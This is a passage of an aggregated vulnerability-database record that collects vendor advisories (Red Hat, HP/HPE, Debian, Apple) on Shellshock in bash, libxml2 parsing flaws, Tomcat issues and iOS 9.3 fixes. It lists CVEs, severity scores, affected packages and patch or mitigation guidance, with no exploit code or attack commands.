server):\n\nSource:\nbash-3.2-24.el5_6.2.src.rpm\n\ni386:\nbash-3.2-24.el5_6.2.i386.rpm\nbash-debuginfo-3.2-24.el5_6.2.i386.rpm\n\nia64:\nbash-3.2-24.el5_6.2.i386.rpm\nbash-3.2-24.el5_6.2.ia64.rpm\nbash-debuginfo-3.2-24.el5_6.2.i386.rpm\nbash-debuginfo-3.2-24.el5_6.2.ia64.rpm\n\nx86_64:\nbash-3.2-24.el5_6.2.x86_64.rpm\nbash-debuginfo-3.2-24.el5_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux EUS (v. 5.9 server):\n\nSource:\nbash-3.2-32.el5_9.3.src.rpm\n\ni386:\nbash-3.2-32.el5_9.3.i386.rpm\nbash-debuginfo-3.2-32.el5_9.3.i386.rpm\n\nia64:\nbash-3.2-32.el5_9.3.i386.rpm\nbash-3.2-32.el5_9.3.ia64.rpm\nbash-debuginfo-3.2-32.el5_9.3.i386.rpm\nbash-debuginfo-3.2-32.el5_9.3.ia64.rpm\n\nppc:\nbash-3.2-32.el5_9.3.ppc.rpm\nbash-debuginfo-3.2-32.el5_9.3.ppc.rpm\n\ns390x:\nbash-3.2-32.el5_9.3.s390x.rpm\nbash-debuginfo-3.2-32.el5_9.3.s390x.rpm\n\nx86_64:\nbash-3.2-32.el5_9.3.x86_64.rpm\nbash-debuginfo-3.2-32.el5_9.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\nx86_64:\nbash-4.1.2-15.el6_4.2.x86_64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\nbash-doc-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux AUS (v. 6.2 server):\n\nSource:\nbash-4.1.2-9.el6_2.2.src.rpm\n\nx86_64:\nbash-4.1.2-9.el6_2.2.x86_64.rpm\nbash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\ni386:\nbash-4.1.2-15.el6_4.2.i686.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.i686.rpm\n\nppc64:\nbash-4.1.2-15.el6_4.2.ppc64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm\n\ns390x:\nbash-4.1.2-15.el6_4.2.s390x.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm\n\nx86_64:\nbash-4.1.2-15.el6_4.2.x86_64.rpm\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2):\n\nSource:\nbash-4.1.2-9.el6_2.2.src.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-9.el6_2.2.x86_64.rpm\nbash-doc-4.1.2-9.el6_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.4):\n\nSource:\nbash-4.1.2-15.el6_4.2.src.rpm\n\ni386:\nbash-debuginfo-4.1.2-15.el6_4.2.i686.rpm\nbash-doc-4.1.2-15.el6_4.2.i686.rpm\n\nppc64:\nbash-debuginfo-4.1.2-15.el6_4.2.ppc64.rpm\nbash-doc-4.1.2-15.el6_4.2.ppc64.rpm\n\ns390x:\nbash-debuginfo-4.1.2-15.el6_4.2.s390x.rpm\nbash-doc-4.1.2-15.el6_4.2.s390x.rpm\n\nx86_64:\nbash-debuginfo-4.1.2-15.el6_4.2.x86_64.rpm\nbash-doc-4.1.2-15.el6_4.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-7169.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7186.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7187.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/1200223\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUJau9XlSAg2UNWIIRAhKkAKC931kAxA4S4exwT4uGhDr7uDFIKQCglKKS\nN0AJiOto/RXwBqHtbfr1wkM=\n=SeAK\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nHP Vertica AMI\u0027s and Virtual Machines prior to v7.1.1-0. \n\nHP has released the following updates to resolve this vulnerability for HP\nVertica products. \n\nUpdate to the latest VM image available at: https://my.vertica.com\n\nFor customers using the AMI version HP Vertica Analytics platform, please\ninstall the latest image available at Amazon. \nUnder Step2: your ITRC operating systems\n - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile\nto update appropriate sections. HP is continually reviewing and enhancing the\nsecurity features of software products to provide customers with current\nsecure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the\nattention of users of the affected HP products the important security\ninformation contained in this Bulletin. HP recommends that all users\ndetermine the applicability of this information to their individual\nsituations and take appropriate action. HP does not warrant that this\ninformation is necessarily accurate or complete for all user situations and,\nconsequently, HP will not be responsible for any damages resulting from\nuser\u0027s use or disregard of the information provided in this Bulletin. To the\nextent permitted by law, HP disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose, title and non-infringement.\"\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. The unit provides Calibration Software\nrunning on embedded Linux, which includes a Bash Shell. The software is used\nfor service purposes only. \n\n NOTE: The vCAS product is vulnerable only if DHCP is enabled. \n\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\nis available. \n\nMITIGATION INFORMATION\n\nA Shellshock attack requires the definition of an environment variable\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\nweb server, and the DHCP client. \n\n - The exploit does not elevate privileges. \n\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS. \n\n Note: HP strongly discourages the use of DHCP on the vCAS. \n\nThe web UI forces the vCAS user to assign a static IP address and change the\nhp-admin password. A vCAS user must manually configure DHCP for use on the\nvCAS. \n\nA vCAS user can verify that DHCP is disabled by inspecting the file\n\"/etc/network/interfaces\" and ensuring that the \"iface\" line for device\n\"eth0\" is set for a static IP",
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VAR-201512-0008
Vulnerability from variot - Updated: 2026-04-10 23:30The xmlParseMisc function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to cause a denial of service (out-of-bounds heap read) via unspecified vectors related to incorrect entities boundaries and start tags. libxml2 is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. libxml2 2.9.2 is vulnerable; other versions may also be affected. Libxml2 is a C language-based function library for parsing XML documents developed by the GNOME project team. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for Red Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements, which are documented in the Release Notes documented linked to in the References. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942, CVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317)
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A session fixation flaw was found in the way Tomcat recycled the requestedSessionSSL field. If at least one web application was configured to use the SSL session ID as the HTTP session ID, an attacker could reuse a previously used session ID for further requests. (CVE-2015-5346)
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A CSRF flaw was found in Tomcat's the index pages for the Manager and Host Manager applications. These applications included a valid CSRF token when issuing a redirect as a result of an unauthenticated request to the root of the web application. This token could then be used by an attacker to perform a CSRF attack. (CVE-2015-5351)
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It was found that several Tomcat session persistence mechanisms could allow a remote, authenticated user to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that placed a crafted object in a session. (CVE-2016-0714)
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A security manager bypass flaw was found in Tomcat that could allow remote, authenticated users to access arbitrary application data, potentially resulting in a denial of service. (CVE-2016-0763)
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A use-after-free flaw was found in the way OpenSSL imported malformed Elliptic Curve private keys. (CVE-2015-0209)
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It was found that Tomcat could reveal the presence of a directory even when that directory was protected by a security constraint. A user could make a request to a directory via a URL not ending with a slash and, depending on whether Tomcat redirected that request, could confirm whether that directory existed. (CVE-2015-5345)
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It was found that Tomcat allowed the StatusManagerServlet to be loaded by a web application when a security manager was configured. This allowed a web application to list all deployed web applications and expose sensitive information such as session IDs. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JWS-271 - User submitted session ID JWS-272 - User submitted session ID JWS-276 - Welcome File processing refactoring - CVE-2015-5345 low JWS-277 - Welcome File processing refactoring - CVE-2015-5345 low JWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate JWS-304 - Restrict another manager servlet - CVE-2016-0706 low JWS-349 - Session serialization safety - CVE-2016-0714 moderate JWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate
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Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04944172
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04944172 Version: 1
HPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager running libXML2, Remote or Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
- IceWall File Manager 3.0
- IceWall Federation Agent 3.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8 CVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE recommends applying the latest OS vendor security patches for libXML2 to resolve the vulnerabilities in the libXML2 library.
Please note that the HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 22 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
For the oldstable distribution (wheezy), these problems have been fixed in version 2.8.0+dfsg1-7+wheezy5.
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions.
For the unstable distribution (sid), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2015:2550-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html Issue date: 2015-12-07 CVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 CVE-2015-8242 CVE-2015-8317 =====================================================================
- Summary:
Updated libxml2 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Several denial of service flaws were found in libxml2, a library providing support for reading, modifying, and writing XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to use an excessive amount of CPU, leak potentially sensitive information, or in certain cases crash the application. (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941, CVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957, BZ#1281955)
Red Hat would like to thank the GNOME project for reporting CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242, and CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the original reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and CVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and CVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. The CVE-2015-1819 issue was discovered by Florian Weimer of Red Hat Product Security.
All libxml2 users are advised to upgrade to these updated packages, which contain a backported patch to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1211278 - CVE-2015-1819 libxml2: denial of service processing a crafted XML document 1213957 - libxml2: out-of-bounds memory access when parsing an unclosed HTML comment 1274222 - CVE-2015-7941 libxml2: Out-of-bounds memory access 1276297 - CVE-2015-7942 libxml2: heap-based buffer overflow in xmlParseConditionalSections() 1276693 - CVE-2015-5312 libxml2: CPU exhaustion when processing specially crafted XML input 1281862 - CVE-2015-7497 libxml2: Heap-based buffer overflow in xmlDictComputeFastQKey 1281879 - CVE-2015-7498 libxml2: Heap-based buffer overflow in xmlParseXmlDecl 1281925 - CVE-2015-7499 libxml2: Heap-based buffer overflow in xmlGROW 1281930 - CVE-2015-8317 libxml2: Out-of-bounds heap read when parsing file with unfinished xml declaration 1281936 - CVE-2015-8241 libxml2: Buffer overread with XML parser in xmlNextChar 1281943 - CVE-2015-7500 libxml2: Heap buffer overflow in xmlParseMisc 1281950 - CVE-2015-8242 libxml2: Buffer overread with HTML parser in push mode in xmlSAX2TextNode 1281955 - libxml2: Multiple out-of-bounds reads in xmlDictComputeFastKey.isra.2 and xmlDictAddString.isra.O
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
aarch64: libxml2-2.9.1-6.el7_2.2.aarch64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm libxml2-python-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-2.9.1-6.el7_2.2.ppc.rpm libxml2-2.9.1-6.el7_2.2.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.2.s390.rpm libxml2-2.9.1-6.el7_2.2.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-devel-2.9.1-6.el7_2.2.s390.rpm libxml2-devel-2.9.1-6.el7_2.2.s390x.rpm libxml2-python-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-static-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-static-2.9.1-6.el7_2.2.ppc.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-static-2.9.1-6.el7_2.2.s390.rpm libxml2-static-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-1819 https://access.redhat.com/security/cve/CVE-2015-5312 https://access.redhat.com/security/cve/CVE-2015-7497 https://access.redhat.com/security/cve/CVE-2015-7498 https://access.redhat.com/security/cve/CVE-2015-7499 https://access.redhat.com/security/cve/CVE-2015-7500 https://access.redhat.com/security/cve/CVE-2015-7941 https://access.redhat.com/security/cve/CVE-2015-7942 https://access.redhat.com/security/cve/CVE-2015-8241 https://access.redhat.com/security/cve/CVE-2015-8242 https://access.redhat.com/security/cve/CVE-2015-8317 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-1 iOS 9.3
iOS 9.3 is now available and addresses the following:
AppleUSBNetworking Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
FontParser Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to bypass code signing Description: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed through improved permission validation. CVE-ID CVE-2016-1751 : Eric Monti of Square Mobile Security
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaça
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
LaunchServices Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to modify events from other applications Description: An event handler validation issue existed in the XPC Services API. This issue was addressed through improved message validation. CVE-ID CVE-2016-1760 : Proteas of Qihoo 360 Nirvan Team
libxml2 Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may auto-fill text into other Message threads Description: An issue existed in the parsing of SMS URLs. This issue was addressed through improved URL validation. CVE-ID CVE-2016-1763 : CityTog
Messages Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Profiles Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An untrusted MDM profile may be incorrectly displayed as verified Description: A certificate validation issue existed in MDM profiles. This was addressed through additional checks. CVE-ID CVE-2016-1766 : Taylor Boyko working with Trend Micro's Zero Day Initiative (ZDI)
Security Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
TrueTypeScaler Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1778 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1783 : Mihai Parparita of Google
